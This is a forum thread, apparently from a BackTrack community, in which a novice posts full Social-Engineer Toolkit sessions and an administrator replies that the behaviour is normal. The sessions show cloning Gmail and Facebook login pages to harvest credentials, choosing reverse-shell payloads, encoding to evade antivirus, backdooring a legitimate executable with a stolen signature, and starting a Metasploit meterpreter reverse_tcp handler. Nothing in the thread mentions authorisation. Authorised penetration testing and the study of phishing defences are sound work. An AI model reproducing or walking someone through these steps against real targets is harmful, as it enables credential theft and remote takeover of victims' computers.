Results 1 to 2 of 2

Thread: Cant get SET to work...

  1. #1
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    1

    Default Cant get SET to work...

    Hi there! Im having some issues with SET im still learning, but couldnt find the problem by myself.



    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Attack Method
    4. Tabnabbing Attack Method
    5. Man Left in the Middle Attack Method
    6. Web Jacking Attack Method
    7. Multi-Attack Web Method
    8. Create or import a CodeSigning Certificate
    9. Return to the previous menu

    Enter your choice (press enter for default): 3



    [!] Website Attack Vectors [!]

    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu

    Enter number (1-4): 1

    Email harvester will allow you to utilize the clone capabilities within SET
    to harvest credentials or parameters from a website as well as place them into a report.



    Select a template to utilize within the web clone attack

    1. Java Required
    2. Gmail
    3. Google
    4. Facebook
    5. Twitter

    Enter the one to use: 2
    [*] Cloning the website: https://gmail.com[*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]

    Press {return} to continue.[*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:

    --------------------------------------------------------------------------------------------------------------

    It just ends there, the payload options (msfconsole) never appears.

    2) In this case the msfconsole displays well but i dont know where is the "java applet" stored to be sent.

    [---] The Social-Engineer Toolkit (SET) [---]
    [---] Written by: David Kennedy (ReL1K) [---]
    [---] Development Team: Thomas Werth [---]
    [---] Development Team: JR DePre (pr1me) [---]
    [---] Version: 1.5.2 [---]
    [---] Codename: 'Convergence Edition' [---]
    [---] Report bugs to: davek@social-engineer.org [---]
    [---] Follow me on Twitter: dave_rel1k [---]
    [---] Homepage: http://www.secmaniac.com [---]
    [---] Framework: http://www.social-engineer.org [---]

    Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

    Select from the menu:

    1. Spear-Phishing Attack Vectors
    2. Website Attack Vectors
    3. Infectious Media Generator
    4. Create a Payload and Listener
    5. Mass Mailer Attack
    6. Teensy USB HID Attack Vector
    7. SMS Spoofing Attack Vector
    8. Wireless Access Point Attack Vector
    9. Third Party Modules
    10. Update the Metasploit Framework
    11. Update the Social-Engineer Toolkit
    12. Help, Credits, and About
    13. Exit the Social-Engineer Toolkit

    Enter your choice: 2



    [!] Website Attack Vectors [!]

    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu

    Enter number (1-4): 1


    Select a template to utilize within the web clone attack

    1. Java Required
    2. Gmail
    3. Google
    4. Facebook
    5. Twitter

    Enter the one to use: 4[*] UPX packer not found in the pathname specified in config. Disabling UPX packing for executable!
    What payload do you want to generate:

    Name: Description:

    1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
    8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
    9. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
    10. Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
    11. SET Custom Written Interactive Shell This is the new custom interactive reverse shell designed for SET
    12. RATTE HTTP Tunneling Payload This is a security bypass payload that will tunnel all comms over HTTP
    13. Import your own executable Specify a path for your own executable

    Enter choice (hit enter for default): 2

    Below is a list of encodings to try and bypass AV.

    Select one of the below, 'backdoored executable' is typically the best.

    1. avoid_utf8_tolower (Normal)
    2. shikata_ga_nai (Very Good)
    3. alpha_mixed (Normal)
    4. alpha_upper (Normal)
    5. call4_dword_xor (Normal)
    6. countdown (Normal)
    7. fnstenv_mov (Normal)
    8. jmp_call_additive (Normal)
    9. nonalpha (Normal)
    10. nonupper (Normal)
    11. unicode_mixed (Normal)
    12. unicode_upper (Normal)
    13. alpha2 (Normal)
    14. No Encoding (None)
    15. Multi-Encoder (Excellent)
    16. Backdoored Executable (BEST)

    Enter your choice (enter for default): 16
    [-] Enter the PORT of the listener (enter for default): 443

    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
    [-] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [!] UPX was not detected. Try configuring the set_config again.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.

    ************************************************** ******
    Do you want to create a Linux/OSX reverse_tcp payload
    in the Java Applet attack as well?
    ************************************************** ******

    Enter choice yes or no: no
    [*] Cloning the website: http://www.facebook.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: p07CxXqUkR[*] Malicious java applet website prepped for deployment


    ************************************************** *
    Web Server Launched. Welcome to the SET Web Attack.
    ************************************************** *

    [--] Tested on IE6, IE7, IE8, IE9, Safari, Chrome, and FireFox [--]
    [*] Launching MSF Listener...[*] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***

    _
    | | o
    _ _ _ _ _|_ __, , _ | | __ _|_
    / |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
    | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
    /|
    \|


    =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
    + -- --=[ 710 exploits - 359 auxiliary - 57 post
    + -- --=[ 225 payloads - 27 encoders - 8 nops
    =[ svn r13097 updated today (2011.07.05)

    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    msf exploit(handler) > [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...




    Im sorry if this is a really stupid post or questions but im trying to learn how this works. THX!!!

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Cant get SET to work...

    I would suggest you get more familiar to what SET does and how it does it before actually using the tool.

    Every behavior you described there is normal, the credential harvester doesn't need any msf payloads and you need to browse the malicious site for the java applet to kick in.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. Intel Pro 3945abg doesn't work work after apt-get dist-upgrade
    By PalmerEldritch in forum BackTrack Bugs
    Replies: 2
    Last Post: 07-22-2010, 02:02 PM
  2. won.t work
    By cristi2008 in forum OLD Newbie Area
    Replies: 5
    Last Post: 10-06-2008, 09:19 AM
  3. BT3 won't work my USB
    By benzslr123 in forum OLD Newbie Area
    Replies: 4
    Last Post: 10-04-2008, 12:22 PM
  4. Will this work?
    By Shonof in forum OLD Newbie Area
    Replies: 3
    Last Post: 03-21-2008, 10:16 AM
  5. Will this work?
    By coubury in forum OLD Newbie Area
    Replies: 2
    Last Post: 02-12-2008, 02:29 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •